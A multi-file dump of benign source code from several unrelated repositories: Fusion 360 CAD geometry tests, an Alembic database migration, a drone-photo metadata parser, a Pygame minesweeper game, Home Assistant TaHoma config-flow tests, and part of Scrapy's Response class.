self.assertEqual(len(list(loft.sides)), 4)
def test_loft_with_hole(self):
outer = Circle(2, "outer")
inner = Circle(1, "inner")
bottom = Difference(outer, inner, name="bottom")
outer2 = Circle(1, "outer2")
inner2 = Circle(.5, "inner2")
top = Difference(outer2, inner2)
top.place(~top == ~bottom,
~top == ~bottom,
(~top == ~bottom) + 1)
loft = Loft(bottom, top)
loft.create_occurrence(True)
self.assertEqual(loft.bottom.brep.pointOnFace.z, 0)
self.assertEqual(loft.top.brep.pointOnFace.z, 1)
self.assertEqual(len(list(loft.sides)), 1)
def test_triple_loft(self):
rect1 = Rect(1, 1, "rect1")
circle = Circle(1)
circle.place(~circle == ~rect1,
~circle == ~rect1,
(~circle == ~rect1) + 1)
rect2 = Rect(1, 1, "rect2")
rect2.place(~rect2 == ~circle,
~rect2 == ~circle,
(~rect2 == ~circle) + 1)
loft = Loft(rect1, circle, rect2)
loft.create_occurrence(True)
self.assertEqual(loft.bottom.brep.pointOnFace.z, 0)
self.assertEqual(loft.top.brep.pointOnFace.z, 2)
self.assertEqual(len(list(loft.sides)), 4)
def run(context):
import sys
test_suite = unittest.defaultTestLoader.loadTestsFromModule(sys.modules[__name__])
unittest.TextTestRunner(failfast=True).run(test_suite)
```
#### File: fscad/tests/silhouette_test.py
```python
import adsk.fusion
from adsk.core import Point3D, Vector3D
import unittest
# note: load_tests is required for the "pattern" test filtering functionality in loadTestsFromModule in run()
from fscad.test_utils import FscadTestCase, load_tests
from fscad.fscad import *
class SilhouetteTest(FscadTestCase):
def test_orthogonal_face_silhouette(self):
rect = Rect(1, 1)
silhouette = Silhouette(rect.faces[0], adsk.core.Plane.create(
Point3D.create(0, 0, -1),
Vector3D.create(0, 0, 1)))
silhouette.create_occurrence(True)
self.assertEquals(silhouette.size().asArray(), rect.size().asArray())
def test_non_orthogonal_face_silhouette(self):
rect = Rect(1, 1)
rect.ry(45)
silhouette = Silhouette(rect.faces[0], adsk.core.Plane.create(
Point3D.create(0, 0, -1),
Vector3D.create(0, 0, 1)))
silhouette.create_occurrence(True)
self.assertEquals(silhouette.size().asArray(), (rect.size().x, rect.size().y, 0))
def test_parallel_face_silhouette(self):
rect = Rect(1, 1)
rect.ry(90)
silhouette = Silhouette(rect.faces[0], adsk.core.Plane.create(
Point3D.create(0, 0, -1),
Vector3D.create(0, 0, 1)))
silhouette.create_occurrence(True)
self.assertEquals(silhouette.size().asArray(), (0, 0, 0))
def test_body_silhouette(self):
box = Box(1, 1, 1)
box.ry(45)
silhouette = Silhouette(box.bodies[0], adsk.core.Plane.create(
Point3D.create(0, 0, -1),
Vector3D.create(0, 0, 1)))
silhouette.create_occurrence(True)
self.assertEquals(silhouette.size().asArray(), (box.size().x, box.size().y, 0))
def test_component_silhouette(self):
rect = Rect(1, 1)
rect.ry(45)
silhouette = Silhouette(rect, adsk.core.Plane.create(
Point3D.create(0, 0, -1),
Vector3D.create(0, 0, 1)))
silhouette.create_occurrence(True)
self.assertEquals(silhouette.size().asArray(), (rect.size().x, rect.size().y, 0))
def test_multiple_disjoint_faces_silhouette(self):
rect1 = Rect(1, 1)
rect2 = Rect(1, 1)
rect2.ry(45)
rect2.tx(2)
assembly = Group([rect1, rect2])
silhouette = Silhouette(assembly.faces, adsk.core.Plane.create(
Point3D.create(0, 0, -1),
Vector3D.create(0, 0, 1)))
silhouette.create_occurrence(True)
self.assertTrue(abs(silhouette.size().x - assembly.size().x) < app().pointTolerance)
self.assertTrue(abs(silhouette.size().y - assembly.size().y) < app().pointTolerance)
self.assertEquals(silhouette.size().z, 0)
def test_multiple_overlapping_faces_silhouette(self):
rect1 = Rect(1, 1)
rect2 = Rect(1, 1)
rect2.ry(45)
rect2.translate(.5, .5)
assembly = Group([rect1, rect2])
silhouette = Silhouette(assembly.faces, adsk.core.Plane.create(
Point3D.create(0, 0, -1),
Vector3D.create(0, 0, 1)))
silhouette.create_occurrence(True)
self.assertTrue(abs(silhouette.size().x - assembly.size().x) < app().pointTolerance)
self.assertTrue(abs(silhouette.size().y - assembly.size().y) < app().pointTolerance)
self.assertEquals(silhouette.size().z, 0)
def test_cylinder_silhouette(self):
cyl = Cylinder(1, 1)
silhouette = Silhouette(cyl, adsk.core.Plane.create(
Point3D.create(0, 0, -1),
Vector3D.create(0, 0, 1)))
silhouette.create_occurrence(True)
self.assertEquals(silhouette.size().asArray(), (cyl.size().x, cyl.size().y, 0))
def test_single_edge(self):
circle = Circle(1)
silhouette = Silhouette(circle.edges[0], adsk.core.Plane.create(
Point3D.create(0, 0, -1),
Vector3D.create(0, 0, 1)))
silhouette.create_occurrence(True)
self.assertEquals(silhouette.size().asArray(), circle.size().asArray())
def test_multiple_edges(self):
rect = Rect(1, 1)
hole1 = Circle(.1)
hole2 = Circle(.2)
hole1.place(
(-hole1 == -rect) + .1,
(-hole1 == -rect) + .1,
~hole1 == ~rect)
hole2.place(
(+hole2 == +rect) - .1,
(+hole2 == +rect) - .1,
~hole2 == ~rect)
assembly = Difference(rect, hole1, hole2)
silhouette = Silhouette(assembly.faces[0].outer_edges, assembly.get_plane())
silhouette.create_occurrence(True)
self.assertEquals(silhouette.size().asArray(), rect.size().asArray())
self.assertEquals(len(silhouette.edges), 4)
def test_named_edges(self):
box = Box(1, 1, 1)
silhouette = Silhouette(
box,
adsk.core.Plane.create(
Point3D.create(0, 0, -1),
Vector3D.create(0, 0, 1)),
named_edges={
"front": box.shared_edges(box.bottom, box.front),
"back": box.shared_edges(box.bottom, box.back),
"left": box.shared_edges(box.bottom, box.left),
"right": box.shared_edges(box.bottom, box.right)})
silhouette.create_occurrence(create_children=True)
edge_finder = Box(.1, .1, .1)
edge_finder.place(
~edge_finder == ~silhouette,
-edge_finder == -silhouette,
~edge_finder == ~silhouette)
found_edges = silhouette.find_edges(edge_finder)
named_edges = silhouette.named_edges("front")
self.assertEquals(len(found_edges), 1)
self.assertEquals(found_edges, named_edges)
edge_finder.place(
~edge_finder == ~silhouette,
+edge_finder == +silhouette,
~edge_finder == ~silhouette)
found_edges = silhouette.find_edges(edge_finder)
named_edges = silhouette.named_edges("back")
self.assertEquals(len(found_edges), 1)
self.assertEquals(found_edges, named_edges)
edge_finder.place(
+edge_finder == +silhouette,
~edge_finder == ~silhouette,
~edge_finder == ~silhouette)
found_edges = silhouette.find_edges(edge_finder)
named_edges = silhouette.named_edges("right")
self.assertEquals(len(found_edges), 1)
self.assertEquals(found_edges, named_edges)
edge_finder.place(
-edge_finder == -silhouette,
~edge_finder == ~silhouette,
~edge_finder == ~silhouette)
found_edges = silhouette.find_edges(edge_finder)
named_edges = silhouette.named_edges("left")
self.assertEquals(len(found_edges), 1)
self.assertEquals(found_edges, named_edges)
def run(context):
import sys
test_suite = unittest.defaultTestLoader.loadTestsFromModule(sys.modules[__name__],
#pattern="named_edges",
)
unittest.TextTestRunner(failfast=True).run(test_suite)
```
#### File: fscad/tests/split_face_test.py
```python
import adsk.fusion
import unittest
# note: load_tests is required for the "pattern" test filtering functionality in loadTestsFromModule in run()
from fscad.test_utils import FscadTestCase, load_tests
from fscad.fscad import *
class SplitFaceTest(FscadTestCase):
def test_basic_split_face(self):
box = Box(1, 1, 1)
cylinder = Cylinder(1, .25)
cylinder.place(~cylinder == ~box,
~cylinder == ~box,
-cylinder == +box)
split = SplitFace(box, cylinder)
split.create_occurrence(True)
self.assertEqual(len(split.split_faces), 1)
self.assertEqual(split.split_faces[0].brep.pointOnFace.z, 1)
def test_basic_split_face_direct(self):
box = Box(1, 1, 1)
cylinder = Cylinder(1, .25)
cylinder.place(~cylinder == ~box,
~cylinder == ~box,
-cylinder == +box)
split = SplitFace(box, cylinder)
split.create_occurrence(True)
self.assertEqual(len(split.split_faces), 1)
self.assertEqual(split.split_faces[0].brep.pointOnFace.z, 1)
def test_multiple_lump_split_face(self):
box1 = Box(1, 1, 1, "box1")
box2 = Box(1, 1, 1, "box2")
box2.place((-box2 == +box1) + 1)
union = Union(box1, box2)
cylinder = Cylinder(1, .25)
cylinder.place(~cylinder == ~box1,
~cylinder == ~box1,
-cylinder == +box1)
split = SplitFace(union, cylinder)
split.create_occurrence(True)
self.assertEqual(len(split.split_faces), 1)
self.assertEqual(split.split_faces[0].brep.pointOnFace.z, 1)
self.assertLess(split.split_faces[0].brep.pointOnFace.x, 1)
def test_multiple_body_split_face(self):
rect1 = Rect(1, 1, "rect1")
rect2 = Rect(1, 1, "rect2")
rect2.place((-rect2 == +rect1) + 1)
union = Union(rect1, rect2)
extrude = Extrude(union, 1)
cylinder = Cylinder(1, .25)
cylinder.place(~cylinder == ~rect1,
~cylinder == ~rect1,
(-cylinder == +rect1)+1)
split = SplitFace(extrude, cylinder)
split.create_occurrence(True)
self.assertEqual(len(split.split_faces), 1)
self.assertEqual(split.split_faces[0].brep.pointOnFace.z, 1)
self.assertLess(split.split_faces[0].brep.pointOnFace.x, 1)
def test_split_face_with_face(self):
box1 = Box(1, 1, 1)
box2 = Box(1, 1, 1)
box2.place((-box2 == +box1) + 1)
union = Union(box1, box2)
cylinder = Cylinder(1, .25).ry(90)
cylinder.place(-cylinder == +box1,
~cylinder == ~box1,
~cylinder == ~box1)
split = SplitFace(union, cylinder.bottom)
split.create_occurrence(True)
self.assertEqual(len(split.split_faces), 1)
self.assertEqual(split.split_faces[0].brep.pointOnFace.x, 1)
self.assertEqual(split.split_faces[0].size().asArray(), (0, .5, .5))
def test_split_face_with_non_coincident_body(self):
box = Box(1, 1, 1)
cylinder = Cylinder(1, .25)
cylinder.place(~cylinder == ~box,
~cylinder == ~box,
~cylinder == +box)
split = SplitFace(box, cylinder)
split.create_occurrence(True)
self.assertEqual(len(split.split_faces), 1)
self.assertEqual(split.split_faces[0].brep.pointOnFace.z, 1)
def run(context):
import sys
test_suite = unittest.defaultTestLoader.loadTestsFromModule(sys.modules[__name__],
#pattern="multiple_body_split_face",
)
unittest.TextTestRunner(failfast=True).run(test_suite)
```
|
{
"source": "jesushl/alembic_example",
"score": 2
}
|
#### File: alembic/versions/a118749841ec_fixing_typos.py
```python
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = "<KEY>"
down_revision = "e97146c004ec"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index("ix_country_id", table_name="country")
op.drop_table("country")
op.drop_index("ix_anual_earning_id", table_name="anual_earning")
op.drop_table("anual_earning")
op.drop_index("ix_quarterly_earning_id", table_name="quarterly_earning")
op.drop_table("quarterly_earning")
op.drop_index("ix_sector_id", table_name="sector")
op.drop_table("sector")
op.drop_index("ix_company_id", table_name="company")
op.drop_table("company")
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"company",
sa.Column(
"id",
sa.INTEGER(),
server_default=sa.text("nextval('company_id_seq'::regclass)"),
autoincrement=True,
nullable=False,
),
sa.Column("symbol", sa.VARCHAR(), autoincrement=False, nullable=True),
sa.Column("description", sa.VARCHAR(), autoincrement=False, nullable=True),
sa.Column("country_id", sa.INTEGER(), autoincrement=False, nullable=True),
sa.Column("sector_id", sa.INTEGER(), autoincrement=False, nullable=True),
sa.ForeignKeyConstraint(
["country_id"], ["country.id"], name="company_country_id_fkey"
),
sa.ForeignKeyConstraint(
["sector_id"], ["sector.id"], name="company_sector_id_fkey"
),
sa.PrimaryKeyConstraint("id", name="company_pkey"),
sa.UniqueConstraint("symbol", name="company_symbol_key"),
postgresql_ignore_search_path=False,
)
op.create_index("ix_company_id", "company", ["id"], unique=False)
op.create_table(
"sector",
sa.Column(
"id",
sa.INTEGER(),
server_default=sa.text("nextval('sector_id_seq'::regclass)"),
autoincrement=True,
nullable=False,
),
sa.Column("name", sa.VARCHAR(), autoincrement=False, nullable=True),
sa.PrimaryKeyConstraint("id", name="sector_pkey"),
sa.UniqueConstraint("name", name="sector_name_key"),
postgresql_ignore_search_path=False,
)
op.create_index("ix_sector_id", "sector", ["id"], unique=False)
op.create_table(
"quarterly_earning",
sa.Column("id", sa.INTEGER(), autoincrement=True, nullable=False),
sa.Column("fiscal_date_ending", sa.DATE(), autoincrement=False, nullable=True),
sa.Column(
"reported_eps",
postgresql.DOUBLE_PRECISION(precision=53),
autoincrement=False,
nullable=True,
),
sa.Column(
"estimated_eps",
postgresql.DOUBLE_PRECISION(precision=53),
autoincrement=False,
nullable=True,
),
sa.Column(
"surprise",
postgresql.DOUBLE_PRECISION(precision=53),
autoincrement=False,
nullable=True,
),
sa.Column(
"surprise_percentage",
postgresql.DOUBLE_PRECISION(precision=53),
autoincrement=False,
nullable=True,
),
sa.Column("company_id", sa.INTEGER(), autoincrement=False, nullable=True),
sa.ForeignKeyConstraint(
["company_id"], ["company.id"], name="quarterly_earning_company_id_fkey"
),
sa.PrimaryKeyConstraint("id", name="quarterly_earning_pkey"),
)
op.create_index(
"ix_quarterly_earning_id", "quarterly_earning", ["id"], unique=False
)
op.create_table(
"anual_earning",
sa.Column("id", sa.INTEGER(), autoincrement=True, nullable=False),
sa.Column("fiscal_date_ending", sa.DATE(), autoincrement=False, nullable=True),
sa.Column(
"reported_eps",
postgresql.DOUBLE_PRECISION(precision=53),
autoincrement=False,
nullable=True,
),
sa.Column("company_id", sa.INTEGER(), autoincrement=False, nullable=True),
sa.ForeignKeyConstraint(
["company_id"], ["company.id"], name="anual_earning_company_id_fkey"
),
sa.PrimaryKeyConstraint("id", name="anual_earning_pkey"),
)
op.create_index("ix_anual_earning_id", "anual_earning", ["id"], unique=False)
op.create_table(
"country",
sa.Column("id", sa.INTEGER(), autoincrement=True, nullable=False),
sa.Column("name", sa.VARCHAR(), autoincrement=False, nullable=True),
sa.PrimaryKeyConstraint("id", name="country_pkey"),
sa.UniqueConstraint("name", name="country_name_key"),
)
op.create_index("ix_country_id", "country", ["id"], unique=False)
# ### end Alembic commands ###
```
#### File: test/data_extraction/test_company.py
```python
symbol = "IBM"
from operator import ipow
from unittest import result
from app.data_extraction.company import (
get_function_link,
get_company_overview,
get_company_earnings,
get_settings,
)
from app.constants import EARNINGS_FUNCTION, OVERVIEW_FUNCTION
def test_get_function_link():
function = EARNINGS_FUNCTION
expected_link_1 = (
"https://www.alphavantage.co/query?function=EARNINGS&symbol=IBM&apikey=demo"
)
assert get_function_link(symbol, function) == expected_link_1
function = OVERVIEW_FUNCTION
expected_link_2 = (
"https://www.alphavantage.co/query?function=OVERVIEW&symbol=IBM&apikey=demo"
)
assert get_function_link(symbol, function) == expected_link_2
def test_get_company_overview():
result = get_company_overview(symbol=symbol)
assert result.get("Symbol") == symbol
def test_get_company_earnings():
result = get_company_earnings(symbol=symbol)
assert result.get("symbol") == symbol
```
|
{
"source": "jesusjoaquin/MIT-GIS-DataLab",
"score": 3
}
|
#### File: jesusjoaquin/MIT-GIS-DataLab/ypr_extraction.py
```python
import os
import copy
import pandas as pd
from config import *
def main():
image_paths = find_image_paths(PHOTOS_DIR)
image_list = list()
yaw_list = list()
pitch_list = list()
roll_list = list()
for path in image_paths:
yaw, pitch, roll = find_metadata(path)
# Prepare values to be transformed to CSV
image_list.append(path[-12:])
yaw_list.append(yaw)
pitch_list.append(pitch)
roll_list.append(roll)
d = {'image_name': image_list, 'yaw': yaw_list,
'pitch': pitch_list, 'roll': roll_list}
df = pd.DataFrame(data=d)
df.to_csv(YPR_CSV, index=False)
def find_image_paths(path):
images = list()
for r, d, f in os.walk(path):
for file in f:
if '.JPG' in file:
images.append(os.path.join(r, file))
return images
def find_metadata(image_path):
# Open the file (JPG)
image = open(image_path, 'rb')
data = image.read()
# Locate the metadata in the file
xmp_start = data.find(b'<x:xmpmeta')
xmp_end = data.find(b'</x:xmpmeta')
xmp_str = copy.deepcopy(data[xmp_start:xmp_end+12])
image.close()
return parse_xmp(xmp_str)
def parse_xmp(xmp_str):
# Make return xmp string a list to iterate through fields
xmp_list = xmp_str.split()
# Dict to store the needed metadata
real_meta = dict()
for x in xmp_list:
name_utf = x.decode('utf-8')
if name_utf[:9] == 'drone-dji':
# Get the key-value pair for the specific field
key, value = parse_field(name_utf)
real_meta[key] = value
yaw = real_meta['drone-dji:GimbalYawDegree']
pitch = real_meta['drone-dji:GimbalPitchDegree']
roll = real_meta['drone-dji:GimbalRollDegree']
return (yaw, pitch, roll)
def parse_field(field):
field_elems = field.split('=')
key = field_elems[0]
value = convert_value(field_elems[1])
return key, value
def convert_value(raw_value):
init_chars = raw_value[:2]
if init_chars not in ['"+', '"-']:
return raw_value
elif init_chars == '"+':
return float(raw_value[2:-1])
else:
return -float(raw_value[2:-1])
if __name__ == '__main__':
main()
```
|
{
"source": "Jesus-Lares/Buscaminas",
"score": 3
}
|
#### File: Buscaminas/files/board.py
```python
from time import clock_getres
import pygame
import random
import sys
from box import Box
from utils import SIZE_HEADER
class Board:
def __init__(self, rows, columns, mines, width, height):
self.width = int(width/rows)
self.height = int(height/columns)
self.rows = rows #Numero de filas eje x
self.columns = columns #Numero de columnas eje y
self.x0 = self.y0 = 0
self.xx = self.yy = 0
self.hide_mines = [] # Matriz 1xN
self.board = [] # Matriz MxN
self.boxes = [] # Matriz 1xN
self.selection_mines = []# Matriz 1xN
self.create_table_board()
self.lay_mines(mines)
self.place_clues()
# Crea el arreglo de las casillas en "SIN MARCAR" con el valor de tabla
color=False
for y in range(columns):
color = not color if columns%2==0 else color
for x in range(rows):
self.boxes.append(Box(x*self.width, y*self.height+SIZE_HEADER, self.width-1, self.height-1, 1, str(self.board[x][y]),color))
color = not color
#Crea una matriz con las filas y columnas y valor que le pasemos
def create_table_board(self):
for i in range(self.rows):
self.board.append([])
for j in range(self.columns):
self.board[i].append(0)
#Coloca en el tablero el numero que le pasemos de minas
def lay_mines(self,mines):
num=0
while num<mines:
y=random.randint(0,self.rows-1)
x=random.randint(0,self.columns-1)
if self.board[y][x] != 9:
self.board[y][x]=9
num+=1
self.hide_mines.append((y,x))
#Coloca las pistas par el juego del buscaminas
def place_clues(self):
for y in range(self.rows):
for x in range(self.columns):
if self.board[y][x]==9:
for i in [-1,0,1]:
for j in [-1,0,1]:
if 0 <= y+i <= self.rows-1 and 0 <= x+j <= self.columns-1:
if self.board[y+i][x+j] != 9:
self.board[y+i][x+j]+=1
def get_box_close(self):
retorno = 0
for c in range(self.rows * self.columns):
if self.boxes[c].get_status() != 3: retorno = retorno + 1
return retorno
def get_num_bombs(self):
retorno = 0
for y in range(self.columns):
for x in range(self.rows):
if self.board[x][y] == 9: retorno += 1
return retorno
#Abrir casillas
def open_box(self, x, y):
playing = False
self.boxes[y*self.rows+x].set_status(3)
if self.board[x][y] != 9:
playing = True
if self.board[x][y] == int('0'):
for j in range(-1, 2):
for i in range(-1, 2):
if (x + j >= 0) and (x + j < self.rows) and (y + i >= 0) and (y + i < self.columns) :
if (self.boxes[(y+i)*self.rows+x+j].get_status() != 3):
self.open_box(x+j, y+i)
return playing
#Imprime las casillas
def print_board(self, screen):
for y in range(self.columns):
for x in range(self.rows):
self.boxes[y*self.rows+x].draw_box(screen)
def open_all_mines(self,screen):
for hide_mine in self.hide_mines:
self.open_box(hide_mine[0], hide_mine[1])
self.print_board( screen)
def compare_mines(self):
return sorted(self.hide_mines) == sorted(self.selection_mines)
# Funciones para el uso del mouse
def change_status_box(self,x,y,new_status=1,status=[3,4]):
if 0<=x < self.rows and 0<= y < self.columns:
if self.boxes[y* self.columns +x].get_status() not in status :
self.boxes[y* self.rows +x].set_status(new_status)
def mouse_motion_board(self,positionX,positionY):
x = int(positionX // self.width)
y = int(positionY // (self.height))-1
if y < 0:
self.change_status_box(self.xx,self.yy)
if self.xx != x or self.yy != y:
self.change_status_box(self.xx,self.yy)
self.change_status_box(x,y,2)
self.xx = x
self.yy = y
def mouse_button_left_down(self,positionX,positionY):
self.xx = self.x0 = int(positionX // self.width)
self.yy = self.y0 = int(positionY // (self.height))-1
self.change_status_box(self.xx,self.yy,2)
def mouse_button_left_up(self,positionX,positionY):
playing=True
x = int(positionX // self.width)
y = int(positionY // (self.height))-1
if len(self.boxes)!= 0 and y>=0:
if self.x0 == x and self.y0 == y and self.boxes[y*self.rows+x].get_status() < 3:
playing = self.open_box(x, y)
return playing
def mouse_button_right_down(self,positionX,positionY,numMines):
self.xx = self.x0 = int(positionX // self.width)
self.yy = self.y0 = int(positionY // (self.height))-1
if self.boxes[self.yy* self.columns +self.xx].get_status() == 3 or self.yy<0: return 0
new_status = 4 if self.boxes[self.yy* self.columns +self.xx].get_status() not in [4,3] else 1
if new_status == 4 and numMines<=0:
return 0
if new_status == 4:
self.selection_mines.append((self.xx,self.yy))
else:
self.selection_mines.remove((self.xx,self.yy))
self.change_status_box(self.xx,self.yy,new_status,[3])
return -1 if new_status == 4 else 1
```
#### File: Buscaminas/files/box.py
```python
from utils import *
import pygame
import pygame.gfxdraw
class Box():
def __init__(self, x, y, size_x, size_y, status, value,color):
self.font = pygame.font.SysFont("arial",18)
self.color = color
self.x = x
self.y = y
self.size_x = size_x
self.size_y = size_y
self.status = status # Estado de la casilla SIN MARCAR, CURSOR_ENCIMA, MARCADA.
self.value = value # Valor de la casilla ' ', '0'...'8' bomba
def set_status(self, status):
self.status = status
def get_status(self):
return self.status
def draw_box(self, screen):
colorBox=BACKGROUND if self.color else PRIMARY
if self.status == 1:# SIN MARCAR
pygame.gfxdraw.box(screen, (self.x, self.y, self.size_x, self.size_y), colorBox)
elif self.status == 2: # CURSOR_ENCIMA
pygame.gfxdraw.box(screen, (self.x, self.y, self.size_x, self.size_y), GRAY)
elif self.status == 3: # MARCADA
if int(self.value) == 9:
pygame.gfxdraw.box(screen, (self.x, self.y, self.size_x, self.size_y), RED)
imgMines = pygame.image.load("images/mina.png")
pictureMines = pygame.transform.scale(imgMines,[20,20])
screen.blit(pictureMines, (self.x + (self.size_x / 2) - (pictureMines.get_width()/2), self.y + (self.size_y / 2) - (pictureMines.get_height()/2)))
else:
pygame.gfxdraw.box(screen, (self.x, self.y, self.size_x, self.size_y), SILVER)
size = self.font.size(self.value)
texto = self.font.render(self.value, 1, COLORS_BOXES[int(self.value)])
screen.blit(texto, (self.x + (self.size_x / 2) - (size[0] / 2), self.y + (self.size_y / 2) - (size[1] / 2)))
elif self.status == 4: # FLAG
pygame.gfxdraw.box(screen, (self.x, self.y, self.size_x, self.size_y), colorBox)
imgFlag = pygame.image.load("images/flag.png")
pictureFlag = pygame.transform.scale(imgFlag,[20,20])
screen.blit(pictureFlag, (self.x + (self.size_x / 2) - (pictureFlag.get_width()/2), self.y + (self.size_y / 2) - (pictureFlag.get_height()/2)))
```
|
{
"source": "jesuslg123/ha-tahoma",
"score": 2
}
|
#### File: ha-tahoma/tests/test_config_flow.py
```python
from unittest.mock import patch
from aiohttp import ClientError
from homeassistant import config_entries, data_entry_flow
from pyhoma.exceptions import BadCredentialsException, TooManyRequestsException
import pytest
from pytest_homeassistant_custom_component.common import MockConfigEntry
from custom_components.tahoma.const import DOMAIN
TEST_EMAIL = "<EMAIL>"
TEST_PASSWORD = "<PASSWORD>"
DEFAULT_HUB = "Somfy TaHoma"
async def test_form(hass, enable_custom_integrations):
"""Test we get the form."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["errors"] == {}
with patch("pyhoma.client.TahomaClient.login", return_value=True):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"username": TEST_EMAIL, "password": <PASSWORD>, "hub": DEFAULT_HUB},
)
assert result2["type"] == "create_entry"
assert result2["title"] == TEST_EMAIL
assert result2["data"] == {
"username": TEST_EMAIL,
"password": <PASSWORD>,
"hub": DEFAULT_HUB,
}
await hass.async_block_till_done()
@pytest.mark.parametrize(
"side_effect, error",
[
(BadCredentialsException, "invalid_auth"),
(TooManyRequestsException, "too_many_requests"),
(TimeoutError, "cannot_connect"),
(ClientError, "cannot_connect"),
(Exception, "unknown"),
],
)
async def test_form_invalid(hass, side_effect, error, enable_custom_integrations):
"""Test we handle invalid auth."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch("pyhoma.client.TahomaClient.login", side_effect=side_effect):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"username": TEST_EMAIL, "password": <PASSWORD>, "hub": DEFAULT_HUB},
)
assert result2["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result2["errors"] == {"base": error}
async def test_abort_on_duplicate_entry(hass, enable_custom_integrations):
"""Test config flow aborts Config Flow on duplicate entries."""
MockConfigEntry(
domain=DOMAIN,
unique_id=TEST_EMAIL,
data={"username": TEST_EMAIL, "password": <PASSWORD>, "hub": DEFAULT_HUB},
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch("pyhoma.client.TahomaClient.login", return_value=True), patch(
"custom_components.tahoma.async_setup", return_value=True
) as mock_setup, patch(
"custom_components.tahoma.async_setup_entry", return_value=True
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"username": TEST_EMAIL, "password": <PASSWORD>, "hub": DEFAULT_HUB},
)
assert result2["type"] == "abort"
assert result2["reason"] == "already_configured"
async def test_allow_multiple_unique_entries(hass, enable_custom_integrations):
"""Test config flow allows Config Flow unique entries."""
MockConfigEntry(
domain=DOMAIN,
unique_id="<EMAIL>",
data={
"username": "<EMAIL>",
"password": <PASSWORD>,
"hub": DEFAULT_HUB,
},
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch("pyhoma.client.TahomaClient.login", return_value=True), patch(
"custom_components.tahoma.async_setup", return_value=True
) as mock_setup, patch(
"custom_components.tahoma.async_setup_entry", return_value=True
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"username": TEST_EMAIL, "password": <PASSWORD>, "hub": DEFAULT_HUB},
)
assert result2["type"] == "create_entry"
assert result2["title"] == TEST_EMAIL
assert result2["data"] == {
"username": TEST_EMAIL,
"password": <PASSWORD>,
"hub": DEFAULT_HUB,
}
async def test_import(hass, enable_custom_integrations):
"""Test config flow using configuration.yaml."""
with patch("pyhoma.client.TahomaClient.login", return_value=True), patch(
"custom_components.tahoma.async_setup", return_value=True
) as mock_setup, patch(
"custom_components.tahoma.async_setup_entry", return_value=True
) as mock_setup_entry:
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data={
"username": TEST_EMAIL,
"password": <PASSWORD>,
"hub": DEFAULT_HUB,
},
)
assert result["type"] == "create_entry"
assert result["title"] == TEST_EMAIL
assert result["data"] == {
"username": TEST_EMAIL,
"password": <PASSWORD>,
"hub": DEFAULT_HUB,
}
await hass.async_block_till_done()
assert len(mock_setup.mock_calls) == 1
assert len(mock_setup_entry.mock_calls) == 1
@pytest.mark.parametrize(
"side_effect, error",
[
(BadCredentialsException, "invalid_auth"),
(TooManyRequestsException, "too_many_requests"),
(TimeoutError, "cannot_connect"),
(ClientError, "cannot_connect"),
(Exception, "unknown"),
],
)
async def test_import_failing(hass, side_effect, error, enable_custom_integrations):
"""Test failing config flow using configuration.yaml."""
with patch("pyhoma.client.TahomaClient.login", side_effect=side_effect):
await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data={
"username": TEST_EMAIL,
"password": <PASSWORD>,
"hub": DEFAULT_HUB,
},
)
# Should write Exception to the log
async def test_options_flow(hass, enable_custom_integrations):
"""Test options flow."""
entry = MockConfigEntry(
domain=DOMAIN,
unique_id=TEST_EMAIL,
data={"username": TEST_EMAIL, "password": <PASSWORD>, "hub": DEFAULT_HUB},
)
with patch("pyhoma.client.TahomaClient.login", return_value=True), patch(
"custom_components.tahoma.async_setup_entry", return_value=True
) as mock_setup_entry:
entry.add_to_hass(hass)
assert await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert len(hass.config_entries.async_entries(DOMAIN)) == 1
assert entry.state == config_entries.ENTRY_STATE_LOADED
result = await hass.config_entries.options.async_init(
entry.entry_id, context={"source": "test"}, data=None
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "update_interval"
assert entry.options == {}
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={
"update_interval": 12000,
},
)
assert entry.options == {"update_interval": 12000}
```
|
{
"source": "jesuslosada/scrapy",
"score": 3
}
|
#### File: http/response/__init__.py
```python
from six.moves.urllib.parse import urljoin
from scrapy.http.request import Request
from scrapy.http.headers import Headers
from scrapy.link import Link
from scrapy.utils.trackref import object_ref
from scrapy.http.common import obsolete_setter
from scrapy.exceptions import NotSupported
class Response(object_ref):
def __init__(self, url, status=200, headers=None, body=b'', flags=None, request=None):
self.headers = Headers(headers or {})
self.status = int(status)
self._set_body(body)
self._set_url(url)
self.request = request
self.flags = [] if flags is None else list(flags)
@property
def meta(self):
try:
return self.request.meta
except AttributeError:
raise AttributeError(
"Response.meta not available, this response "
"is not tied to any request"
)
def _get_url(self):
return self._url
def _set_url(self, url):
if isinstance(url, str):
self._url = url
else:
raise TypeError('%s url must be str, got %s:' % (type(self).__name__,
type(url).__name__))
url = property(_get_url, obsolete_setter(_set_url, 'url'))
def _get_body(self):
return self._body
def _set_body(self, body):
if body is None:
self._body = b''
elif not isinstance(body, bytes):
raise TypeError(
"Response body must be bytes. "
"If you want to pass unicode body use TextResponse "
"or HtmlResponse.")
else:
self._body = body
body = property(_get_body, obsolete_setter(_set_body, 'body'))
def __str__(self):
return "<%d %s>" % (self.status, self.url)
__repr__ = __str__
def copy(self):
"""Return a copy of this Response"""
return self.replace()
